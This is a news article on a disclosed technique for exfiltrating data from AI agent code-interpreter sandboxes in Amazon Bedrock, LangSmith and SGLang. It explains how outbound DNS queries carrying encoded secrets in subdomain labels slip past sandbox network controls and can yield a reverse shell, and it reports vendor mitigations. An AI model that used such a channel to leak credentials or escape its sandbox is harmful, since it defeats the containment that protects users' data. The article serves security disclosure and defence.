Cybersecurity researchers disclosed on Monday a new method for exfiltrating sensitive data from artificial intelligence code execution environments. The technique exploits outbound domain name system, or DNS, queries to bypass security controls in platforms including Amazon Bedrock and LangSmith.
The findings, detailed in a report by security firm BeyondTrust, highlight a critical vulnerability in the sandboxed interpreters used by AI agents. These interpreters allow AI models to execute code, but the discovered flaw permits unauthorized Data Exfiltration and can lead to Remote Code Execution, or RCE.
Core Vulnerability in Sandboxed Interpreters
According to the report, the Amazon Bedrock Agent’s Code Interpreter, when in its sandbox mode, incorrectly permits outbound DNS queries. An attacker can craft malicious code that forces the AI agent to perform DNS lookups containing encoded sensitive data. This data is sent to a domain controlled by the attacker, effectively stealing it from the secured environment.
The vulnerability is not isolated to a single provider. Researchers demonstrated similar data exfiltration techniques against LangChain’s LangSmith platform and the SGLang server. These platforms are widely used by developers to build, debug, and deploy applications powered by large language models, or LLMs.
Mechanism of the Attack
The attack exploits a fundamental trust in sandbox security. While these environments typically restrict network access to prevent data leaks, they often allow DNS queries for legitimate functionality, such as connecting to APIs. Attackers can hijack this mechanism.
By embedding stolen information, like API keys or file contents, into subdomain labels of a DNS query, the data is sent to an attacker’s name server. The attacker then decodes the information from the DNS logs. In more severe cases, this channel can be used to establish a reverse shell, granting full remote control over the compromised environment.
Widespread Impact on AI Development
The affected platforms are integral to the current AI application ecosystem. Amazon Bedrock is a fully managed service offering foundation models from various AI companies. LangSmith provides a suite of tools for tracing, testing, and monitoring LLM applications. SGLang is a runtime engine designed for efficient execution of LLMs.
The vulnerability means that any organization using these tools for AI development could be at risk. Sensitive data processed by AI agents, including proprietary code, internal documents, and credentials, could be silently stolen without triggering traditional network security alarms.
Vendor Responses and Mitigations
Following responsible disclosure by BeyondTrust, the involved vendors have taken steps to address the issues. Amazon Web Services updated the Bedrock Code Interpreter to block outbound DNS resolution by default. LangChain implemented validation to reject prompts containing suspicious DNS patterns.
Security experts recommend that users of these platforms apply all available updates immediately. They also advise implementing additional layers of network monitoring specifically for unusual DNS query patterns originating from AI development and runtime environments.
Broader Security Implications for AI
This incident underscores the evolving security challenges presented by generative AI and agentic systems. As AI models gain the ability to perform actions and execute code, the attack surface expands significantly. Traditional application security models must be adapted to account for these new, AI-specific threat vectors.
The research indicates that the assumption of safety within a code interpreter sandbox can be dangerously misplaced if all network egress points are not rigorously controlled. It calls for a principle of least privilege for AI agents, similar to that applied in conventional IT security.
Further analysis and security audits of other AI agent platforms and code execution environments are expected in the cybersecurity community. Industry groups are likely to develop new best practice frameworks for securing AI development tools against data exfiltration and supply chain attacks.
Source: BeyondTrust